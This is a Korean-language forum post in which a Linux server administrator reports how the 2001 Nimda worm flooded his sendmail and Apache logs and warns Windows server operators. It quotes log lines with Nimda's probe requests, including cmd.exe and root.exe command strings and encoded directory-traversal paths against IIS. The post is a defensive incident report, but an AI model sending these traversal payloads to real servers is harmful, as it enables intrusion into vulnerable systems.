>> Delete No. 2714 article
No. nimda 바이러스가 센드메일에 미치는 영향

등록 2002-07-30 17:47:00     조회 4
이름 killbug0    

		죄송 제 개인적인 생각으로 도움이 될까해서요..
 어제 저녁 18일 22시 부터 센드메일에 이상한 로그가 자꾸 남아서
분석을 했는데 ..
이런 메일로그가 남더군요 ..
Sep 18 22:17:46 localhost sendmail[11804]: f8IDHk511804: collect:
premature EOM: Error 0
Sep 18 22:17:46 localhost sendmail[11804]: f8IDHk511804: collect:
unexpected close on connection from [211.197.111.111],
sender=<aaaa200 at hanmail.net>: Error 0
 그래서 여러 사이트를 검색하다가 센드메일 faq문서에 이런 내용이 있데요.
  If you are just getting occasional such messages, they're probably
due to a temporary network problem, or the remote host crashing or
otherwise abruptly terminating the connection.
 근데 내 눈에 뛰는게  crashing 단어 그 것을 보는 순간 nimda 바이러스가
뇌리를 스치더군요. 그래서 자료를 뒤져보니
 "이 바이러스에 대한 대처는 바이러스가 너무 신속하게 공격해 어려움을
겪고 있다. 줄로토는 세계 표준시간으로 13시 (한국시간 18일 밤 10시) 에
노르웨이의 한 웹사이트에서 이 바이러스가 처음 발견됐다고 말했다."
 으 밤 10시 그래서 아파치 로그를 확인해보니
211.42.47.73 - - [18/Sep/2001:22:07:19 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
211.42.47.73 - - [18/Sep/2001:22:07:19 +0900]
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
211.42.47.73 - - [18/Sep/2001:22:07:19 +0900]
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
211.42.47.73 - - [18/Sep/2001:22:07:20 +0900]
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
211.42.47.73 - - [18/Sep/2001:22:07:20 +0900]
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 302
211.42.47.73 - - [18/Sep/2001:22:07:20 +0900]
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 319
211.42.47.73 - - [18/Sep/2001:22:07:20 +0900]
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 319
211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /msadc/
..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
 이런 로그가 도배를 했더군요 , 로그가 쌓이는 속도가 장난이 아니데요
서비스를 하지않는 아파치로그가
-rw-r--r--    1 root     root  6.1M Sep 19 15:21 access_log
-rw-r--r--    1 root     root  3.8M Sep 19 15:21 error_log
위에 로그 용량은 순전히 nimda바이러스가 남기고 간 로그파일만 있는데
하루만에 6.1메가 라니  우리나라 서버을 다 함치면 엄청난 트래픽이
발생하고 있는것 같네요.
리눅스 서버에는 직접적인 영향은 없지만 네트웍 트래픽이 증가 하면서
메일 서버에 영향을 미치는 것 같네요.
그리구 웹서버에도 액세스가 늘어나 속도 저하가 생길 것이구요
코드레드 보다 더 강력한 트래픽을 발생시키고 있는 것 같네요
 nimda 바이러스는 최초로 발견된 것은 외국이지만 거의 동시에
우리 나라도 융단 폭격을 당하고 있는 것 같네요.
 윈도우 서버 돌리시는 분들 조심하세요
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved